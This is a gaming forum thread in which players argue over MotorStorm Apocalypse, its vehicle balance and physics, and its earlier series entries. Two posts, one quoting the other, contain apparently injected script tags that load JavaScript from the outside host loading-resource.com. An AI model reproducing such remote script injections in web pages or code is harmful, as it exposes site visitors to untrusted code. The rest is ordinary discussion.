Showing results for 
Search instead for 
Do you mean 
Fender Bender
2952 posts

Re: So what are you all going to play now? Apocolypse?

Nov 11, 2012

It's £39.99 here Brian, which is €50 ... you're getting screwed over there. I'd say it's worth it ... there is some incredible content and the mini-games take it much further than just racing ... some of them are infuriating, but you just have to complete them haha. I haven't even unlocked all the tracks yet, but racing online is great fun ... can't wait to start making my own content and racing others' content with friends online.

Plus it's split-screen online ... me and Hal can play together online. It's awesome.

Surger
Please use plain text.
Message 21 of 68 (422 Views)
0 Likes
Lombax Warrior
98 posts

[ Edited ]
Nov 11, 2012

MSA is the only game I play at the moment.  It may not be offroad, but it is the only game that will keep my interest.  I get really bored with other racing game easily.  I like the wreakage, the boost explosions, the punching, the no moon gravity, and the mods that make it even more interesting.  especially to cut down on loading times.  The only main issues that I have with MSA, is the servers,  the **bleep** debris (that I often hit),  But, once you get to know the routes, the debris isn't really a big factor. And last, the betting system.  The perks don't really bother me much. Sure, this is not PR or the MV, but it is still a good game.  It is unique to other racing games and fun to play.  I think if people would stop making comparison to PR and MV, and give it some regularly good play time, you might come to the same conclusions.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
http://www.youtube.com/user/hafadude69
Please use plain text.
Message 22 of 68 (399 Views)
Hekseville Citizen
293 posts

[ Edited ]
Nov 11, 2012

hafa_dude wrote:

MSA is the only game I play at the moment.  It may not be offroad, but it is the only game that will keep my interest.  I get really bored with other racing game easily.  I like the wreakage, the boost explosions, the punching, the no moon gravity, and the mods that make it even more interesting.  especially to cut down on loading times.  The only main issues that I have with MSA, is the servers,  the **bleep** debris (that I often hit),  But, once you get to know the routes, the debris isn't really a big factor. And last, the betting system.  The perks don't really bother me much. Sure, this is not PR or the MV, but it is still a good game.  It is unique to other racing games and fun to play.  I think if people would stop making comparison to PR and MV, and give it some regularly good play time, you might come to the same conclusions.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

Hafa, apart from a few Cirrustians, most people have already come to the conclusion that  Apocalypse is worth playing.  Ironic really that the only two people who have vehicles named after them don't play the game. At least Ninja has a good excuse. Cirrus, on the other hand, had already decided to rubbish Apocalypse well before it was released.  His loyal followers like Critter the Baptist  have backed him all the way and made it appear to be the norm on these forums which is unfortunate (for them mainly) 

The rest of us heretics all love Apocalypse and while it may appear that some of us haven't played for a while, we have always been there :smileyhappy:

The only people I pity are those who never played Apocalypse because of the bad rap it got here on the forums by the Cirrustians. Enjoy Little Big Planet guys!!!!!!! 

Please use plain text.
Message 23 of 68 (382 Views)
0 Likes
Fender Bender
2952 posts

Nov 12, 2012

The comedic part is, you assume I haven't played Apocalypse ... I've played plenty of split-screen with my brother to have a decent understanding as to how the game operates. Hell, I even won a race under his name in one of the Supermini Cups (against all the regulars - so we're talking tournament level competition). I had a basic understanding of the line and strategy from watching my brother a few times, and I won that race ... and it's on video somewhere.

I've even got my own set of customised vehicles on his save data. A "7th Heaven" Italia Cirrus being my favourite naturally.

My brother even tells me the occasional inside detail that only a Time Attacker would know ... things like how your Dirt Bike needs to land with a certain speed on Rising Damp as you jump over that beached cargo ship, but that it's possible to achieve a sort of "fluke speed", which is rarely attained and out of the player's control.

From the moment I saw samples of Apocalypse's gameplay, I knew it would be horrible to play ... and every negative expectation I had of it held true in every single race I ever played on it. I could never play it seriously because it's too aggravating ... carelessly built, wrecklessly smashed together to try and be something that it's not ... regardless of all the fancy features and beautiful dressing it was given, if its physics are the core of its problem ... then nothing else matters to me ... it's already a lost cause; ruined.

I can grant praise and have done in the past regarding particular tracks, the customisation element to the game, and some of the soundtrack appeals to me as well ... but again, none of it matters when the gameplay is flimsy, erratic and even more unrealistic than its predeccesors. 

Surger
Please use plain text.
Message 24 of 68 (355 Views)
Fender Bender
2952 posts

Nov 12, 2012

LittleBigPlanet: Karting, however, is everything I expected it to be ... and much more. Fantastic fun racing, done correctly.

Surger
Please use plain text.
Message 25 of 68 (353 Views)
0 Likes
I Only Post Everything
785 posts

Nov 12, 2012

A bit of a harsh comment Woppa. My ex bought me Apocolypse on it's release day and I tried it out for a while... and hated it. I never liked the idea of it in the first place, nor the first pieces of footage and was against the series' direction change from the start, but I still tried it out for a decent amount of time. That doesn't make me wrong or bad to dislike it or to advise other people looking for MSMV and MSPR replacements, it's just not my sort of game and other people who want to re-experience the sensations of MSMV or MSPR again will also be disappointed. Might as well save them a bit of cash before wasting it on something with the wrong expectations.

Please use plain text.
Message 26 of 68 (347 Views)
Hekseville Citizen
293 posts

[ Edited ]
Nov 12, 2012

@Lewis Yeah maybe a bit harsh but considering all the cheap shots that I've had to read about Apocalypse, sometimes I feel the need to vent.

@Cirrus Enjoy Little Big Planet :smileyhappy:

Please use plain text.
Message 27 of 68 (338 Views)
0 Likes
Survivor
2514 posts

Nov 12, 2012

same for me, i got msa day one, played it for about 1 month...at first i thought that i just needed to get used to it to really enjoy it, because ms2 felt a little wrong at first too, after having played ms1 for years...but after that wasted month i realised that msa is just pure crap and doesn´t deserve to be ever played again....btw...in that single month of msa i experienced more server issues than i did in ms1 and ms2 together in 5-6 years

10000 ranked wins :-)

Rudisha > Bolt
Please use plain text.
Message 28 of 68 (304 Views)
0 Likes
Hekseville Citizen
293 posts

[ Edited ]
Nov 12, 2012

critter80 wrote:

same for me, i got msa day one, played it for about 1 month...at first i thought that i just needed to get used to it to really enjoy it, because ms2 felt a little wrong at first too, after having played ms1 for years...but after that wasted month i realised that msa is just pure crap and doesn´t deserve to be ever played again....btw...in that single month of msa i experienced more server issues than i did in ms1 and ms2 together in 5-6 years

I actually agree with you critter. The game was absolute crap in the beginning. It should never have been released as it was. There was only 1 vehicle - the rally car. The rest were slow and glitchy. The mudplugger would land and go sideways, the dirtbike was a joke, as was the supercar. To Evo's credit though they listened to criticism and gave all the vehicles a tweak in three seperate updates. Now the vehicles   are quite balanced. In TA the dirtbike, supercar, rally, atv, rig, and muscle car have all held fastest times on various tracks. The buggy and superbike are also worth racing online. The racing truck is just ok and the chopper is still crap. The monster truck is a nuisance on most tracks but competitive on a couple. Overall, I think the vehicles, now, after the updates are much more evenly balance than they were in MSPR.

As for the physics, we laugh when we hear someone from MSPR, criticise the physics in MSA. i remember racing MSPR thinking, my vehicle isn't even on the track surface, it is hovering 10cm above it. The gravity was all wrong, the vehicles turned badly and were unresponsive . Actually the physics in Monument Valley were much better than MSPR.  As for the roadrunner boost strategy - beep beep beep beep beep beep beep or not boosting at all and accelerating up hills.... Come on!!! Then there is the boost exploding to gain advantage. Yeah the Pacific Rift physics were perfect - NOT!!!!

The difference between us is that I saw the potential in MSA and stuck with it, at times with great angst,  but now the game is where it should have been when it was first released.

Yes Apocolypse was rushed and obviously not tested properly before it was released, but now apart from some minor dropouts, it is a very enjoyable game.

Let's just agrree to disagree :smileyhappy:

Please use plain text.
Message 29 of 68 (296 Views)
Survivor
2514 posts

Nov 12, 2012

woppatoosay wrote:
not boosting at all and accelerating up hills...

you never understood what NEB is did you?...there is no single point in the game where you ACCELERATE up hills without boosting...instead you lose not as much of your speed as if you had, holding the accelerator. it´s the same effect with a car: if you go down a steep enough hill and your engine reaches the engine speed limiter(=engine brake) your car would actually roll faster if you stopped accelerating because the car´s speed is limited with the "engine brake"...this means that on a steep enough downhill you can roll faster than the engine would let you...then, when the downhill turns into an uphill and you still keep rolling, your speed can still be very very fast, but still your speed would decrease slowly...and this is exactly what happens when NEBbing into 3rd split on The Edge...you´re NOT accelerating there, you slowly lose your speed, that´s all

10000 ranked wins :-)

Rudisha > Bolt
Please use plain text.
Message 30 of 68 (266 Views)